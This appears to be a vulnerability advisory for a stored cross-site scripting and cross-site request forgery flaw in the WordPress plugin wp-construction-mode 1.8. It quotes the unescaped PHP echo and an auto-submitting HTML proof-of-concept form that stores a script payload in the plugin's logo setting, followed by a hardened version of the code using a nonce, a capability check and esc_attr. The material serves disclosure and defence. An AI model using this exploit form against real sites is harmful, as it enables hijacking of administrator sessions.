######################
# Exploit Title : Wordpress wp-construction-mode.1.8 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/wp-construction-mode

# Software Link : http://downloads.wordpress.org/plugin/wp-construction-mode.1.8.zip

# Date : 2014-06-27

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://localhost/wp-admin/admin.php?page=under-construction.php

######################

# Vulnerable code :

<tr>
<td><?php _e('Logo') ?></td>
<td>
<!-- $wuc_logo is echoed straight into the value attribute with no esc_attr(): a stored value containing a double quote breaks out of the attribute -->
<input type="text" name="wuc_logo" value="<?php echo $wuc_logo ?>" placeholder="<?php _e('Enter image path/url or leave blank for no logo'); ?>"/>
</td>
</tr>


######################

# Exploit Code :

<html>
<body>
<form name="post_form" method="post" action="http://localhost/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data">
<input type="hidden" name="wuc_logo" value='"/><script>alert(1);</script>'/>
<input type="hidden" name="act" value="save" />
<script type="text/javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>
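The settings row and save handler as a plugin author would harden them, covering both issues the advisory shows: the unescaped echo of $wuc_logo (the XSS sink) and the fact that the PoC can submit the save form from a foreign page (no nonce or capability check). This is an added example, not code from the wp-construction-mode plugin; the function names wuc_save_settings and wuc_render_logo_row, the nonce action 'wuc_save_settings', the option name 'wuc_logo' and the text domain 'wp-construction-mode' are assumptions. All WordPress API calls used (check_admin_referer, current_user_can, sanitize_text_field, wp_unslash, update_option, get_option, wp_nonce_field, esc_attr, esc_html_e, esc_attr_e) are standard core functions.

```php
<?php
// Added example (not the plugin's own code). Names prefixed wuc_ are assumed.

// Save handler: only accept the request when it carries a valid nonce for the
// current user and the user may manage options, then sanitize before storing.
function wuc_save_settings() {
    if ( ! isset( $_POST['act'] ) || $_POST['act'] !== 'save' ) {
        return;
    }
    // Stops the auto-submitted cross-site form in the PoC: a third-party page
    // cannot read the per-user nonce value, so the request dies here.
    check_admin_referer( 'wuc_save_settings', 'wuc_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }

    // Strip tags and stray control characters from the submitted path/URL.
    $logo = isset( $_POST['wuc_logo'] )
        ? sanitize_text_field( wp_unslash( $_POST['wuc_logo'] ) )
        : '';
    update_option( 'wuc_logo', $logo );
}

// Render: escape on output regardless of what was sanitized on input, so a
// value such as "/><script>alert(1);</script> stays inside the attribute.
function wuc_render_logo_row() {
    $wuc_logo = get_option( 'wuc_logo', '' );
    ?>
    <tr>
      <td><?php esc_html_e( 'Logo', 'wp-construction-mode' ); ?></td>
      <td>
        <?php wp_nonce_field( 'wuc_save_settings', 'wuc_nonce' ); ?>
        <input type="text" name="wuc_logo"
               value="<?php echo esc_attr( $wuc_logo ); ?>"
               placeholder="<?php esc_attr_e( 'Enter image path/url or leave blank for no logo', 'wp-construction-mode' ); ?>" />
      </td>
    </tr>
    <?php
}
```

With esc_attr() in place the PoC payload is emitted as `&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt;`, which the browser treats as literal text inside the value attribute; the nonce check independently rejects the cross-site POST before anything is stored.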

#####################

Discovered By : ACC3SS

#####################